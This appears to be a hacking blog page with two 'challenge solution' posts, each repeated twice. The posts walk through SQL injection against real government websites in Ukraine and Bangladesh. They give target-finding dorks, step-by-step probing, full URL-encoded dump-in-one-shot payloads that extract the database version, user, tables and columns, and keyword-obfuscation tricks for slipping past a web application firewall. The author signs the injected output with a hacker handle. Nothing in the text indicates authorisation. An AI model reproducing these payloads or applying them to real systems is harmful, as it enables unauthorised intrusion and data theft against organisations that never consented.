All Website Pentesting tutorials are here
Tuesday, June 14, 2016
Tuesday, May 31, 2016
Sunday, May 22, 2016
Wednesday, May 18, 2016
Monday, March 7, 2016
SQLi Challenge Solution 4
First of all Helo Guys :D ... Hope You all are fine... Today I'm going to show you the solution of my SQLi Challenge 4 based on MSSQLi..
First of all we'll see my challenge rules/tasks.
Target is dlc2.academy.gov.ua and We've to print Cyber Name , Version , DB , User , Tables and Columns
Now Follow me :D ..
1. We'll find injection point... as you know .asp & .aspx extensions are common in MSSQLi..
So, Now time to use dorks :p
site:dlc2.academy.gov.ua inurl:.asp?id=
First Result : http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}
2. Now We'll Check it's vuln or not and try to balance the query..
Putting Single Quote
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'
:D yeahhhhhh it's showing error .........
Now We'll try to balance the query by using comments..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'-- - > No Error
O.o no error while using single quote .. it means :D site is string based...
3. Now We'll find total number of columns...
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 5-- - > Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 3-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 4-- - > No Error
:D so, total number of columns are 4..
4. Now We'll use Union Select..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select 1,2,3,4-- - > Error
:3 as always int problem...
Now we'll convert all into null..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,null-- - > No Error
-_- as what i said....
Now we'll convert one by one them in int..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,4-- - > No Error
and now It's showing Vuln Column "4" :D yeahhhhhhhhhhhhhhhh Hurrayyy <3 .........
5. Now time to DIOS...
For Detailed MSSQLi Visit : securityidiots.com
Now I'm going to use The DIOS of master Zen <3
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
:p Lemme do some changes ... Adding New Line + User
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
:D Done
Now time to Inject our DIOS
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}';BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
Injected ;)
Now we've to dump our DIOS..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,(select output from dark_challenge_solution)-- -
Picture here..
:o WTF??? DIOS not injected successfully >:o >:(
-_- No We've to Inject site with manual DIOS
for this I'll use this DIOS Thanks to Foysal Hossain ( Root X Force ) :D
'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
Putting DIOS in site and injecting..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
o.O why not showing...? :3 Ohhhh we've to put " and 1=0 " for error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' and 1=0 union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
B| Done Site Injected Successfully...
Hope You Like My Tutorial of my Challenge Solution :D ... Thanks for watching
First of all we'll see my challenge rules/tasks.
Target is dlc2.academy.gov.ua and We've to print Cyber Name , Version , DB , User , Tables and Columns
Now Follow me :D ..
1. We'll find injection point... as you know .asp & .aspx extensions are common in MSSQLi..
So, Now time to use dorks :p
site:dlc2.academy.gov.ua inurl:.asp?id=
First Result : http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}
2. Now We'll Check it's vuln or not and try to balance the query..
Putting Single Quote
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'
:D yeahhhhhh it's showing error .........
Now We'll try to balance the query by using comments..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'-- - > No Error
O.o no error while using single quote .. it means :D site is string based...
3. Now We'll find total number of columns...
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 5-- - > Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 3-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 4-- - > No Error
:D so, total number of columns are 4..
4. Now We'll use Union Select..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select 1,2,3,4-- - > Error
:3 as always int problem...
Now we'll convert all into null..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,null-- - > No Error
-_- as what i said....
Now we'll convert one by one them in int..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,4-- - > No Error
and now It's showing Vuln Column "4" :D yeahhhhhhhhhhhhhhhh Hurrayyy <3 .........
5. Now time to DIOS...
For Detailed MSSQLi Visit : securityidiots.com
Now I'm going to use The DIOS of master Zen <3
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
:p Lemme do some changes ... Adding New Line + User
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
:D Done
Now time to Inject our DIOS
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}';BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
Injected ;)
Now we've to dump our DIOS..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,(select output from dark_challenge_solution)-- -
Picture here..
:o WTF??? DIOS not injected successfully >:o >:(
-_- No We've to Inject site with manual DIOS
for this I'll use this DIOS Thanks to Foysal Hossain ( Root X Force ) :D
'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
Putting DIOS in site and injecting..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
o.O why not showing...? :3 Ohhhh we've to put " and 1=0 " for error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' and 1=0 union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
B| Done Site Injected Successfully...
Hope You Like My Tutorial of my Challenge Solution :D ... Thanks for watching
Sunday, January 3, 2016
SQLi Challenge Solution 3
So, First of all hello guys ^_^ as always :p
My tasks and rules was this...
As You know MySQL Union Based Injection will not work.
Now we'll think bout error based.. but sadly in this query some words are not acceptable according to my rules..
Now we'll think Xpath will work but it's not for DIOS .. it shows less data and Polygon Injection show few more data than xpath injection.
For this challenge Dual Injection is best it shows most data than all these injections..
and Query of Dual Injection is this :
and(select(!dark-~007)from(select (@@version) dark)angel)--+-
So, let's start...
1. We'll see website is vuln or not
http://bpc.gov.bd/gallery.php?id=6' > error
2. Now We'll check Which comment is working
http://bpc.gov.bd/gallery.php?id=6'--+- > No error it means this comment is working ^_^
3. We'll Execute Dual Injection Query.
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@version) dark)angel)--+- > WAF -_-
4. We'll Bypass The WAF.. We'll Put \ to know which word is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@ver\sion) dark)angel)--+- > no error it means version is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (/*!50000@@version*/) dark)angel)--+- > :) Byassed...
5. First we'll print Cyber name,version,database and user to DIOS...
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat(/*!50000@@version*/,database(),user()) dark)angel)--+- > Again WAF -_-
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (c\oncat(/*!50000@@version*/,dat\abase(),us\er()) dark)angel)--+- > no error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (/*!50000@@version*/,/*!50000database*/(),/*!50000user*/())) dark)angel)--+-
Now We'll add Cyber name , Version :: , Database :: , User :: and <br>
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e)) dark)angel)--+- > Done ! Printed
6. Now We'll Dump Tables and Columns to complete the DIOS...
To Dump Tables and Columns I'll use this Query :
(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x)
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x))) dark)angel)--+- > Blocked by WAF
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) fr\om(select(@:=0x00),(select(0) fro\m(info\rmation_schema.columns)wh\ere(ta\ble_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,ta\ble_name,0x203a3a20,colu\mn_name))))x))) dark)angel)--+- > No error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) /*!50000from*/(select(@:=0x00),(select(0) /*!50000from*/(/*!50000information_schema*/.columns)/*!50000where*/(/*!50000table_schema*/!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))) dark)angel)--+- > DIOS Bypassed :D
Challenge Solved !
Happy Injecting....
#D4RK_4NG31
My tasks and rules was this...
As You know MySQL Union Based Injection will not work.
Now we'll think bout error based.. but sadly in this query some words are not acceptable according to my rules..
Now we'll think Xpath will work but it's not for DIOS .. it shows less data and Polygon Injection show few more data than xpath injection.
For this challenge Dual Injection is best it shows most data than all these injections..
and Query of Dual Injection is this :
and(select(!dark-~007)from(select (@@version) dark)angel)--+-
So, let's start...
1. We'll see website is vuln or not
http://bpc.gov.bd/gallery.php?id=6' > error
2. Now We'll check Which comment is working
http://bpc.gov.bd/gallery.php?id=6'--+- > No error it means this comment is working ^_^
3. We'll Execute Dual Injection Query.
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@version) dark)angel)--+- > WAF -_-
4. We'll Bypass The WAF.. We'll Put \ to know which word is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@ver\sion) dark)angel)--+- > no error it means version is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (/*!50000@@version*/) dark)angel)--+- > :) Byassed...
5. First we'll print Cyber name,version,database and user to DIOS...
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat(/*!50000@@version*/,database(),user()) dark)angel)--+- > Again WAF -_-
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (c\oncat(/*!50000@@version*/,dat\abase(),us\er()) dark)angel)--+- > no error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (/*!50000@@version*/,/*!50000database*/(),/*!50000user*/())) dark)angel)--+-
Now We'll add Cyber name , Version :: , Database :: , User :: and <br>
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e)) dark)angel)--+- > Done ! Printed
6. Now We'll Dump Tables and Columns to complete the DIOS...
To Dump Tables and Columns I'll use this Query :
(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x)
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x))) dark)angel)--+- > Blocked by WAF
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) fr\om(select(@:=0x00),(select(0) fro\m(info\rmation_schema.columns)wh\ere(ta\ble_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,ta\ble_name,0x203a3a20,colu\mn_name))))x))) dark)angel)--+- > No error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) /*!50000from*/(select(@:=0x00),(select(0) /*!50000from*/(/*!50000information_schema*/.columns)/*!50000where*/(/*!50000table_schema*/!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))) dark)angel)--+- > DIOS Bypassed :D
Challenge Solved !
Happy Injecting....
#D4RK_4NG31
Thursday, December 24, 2015
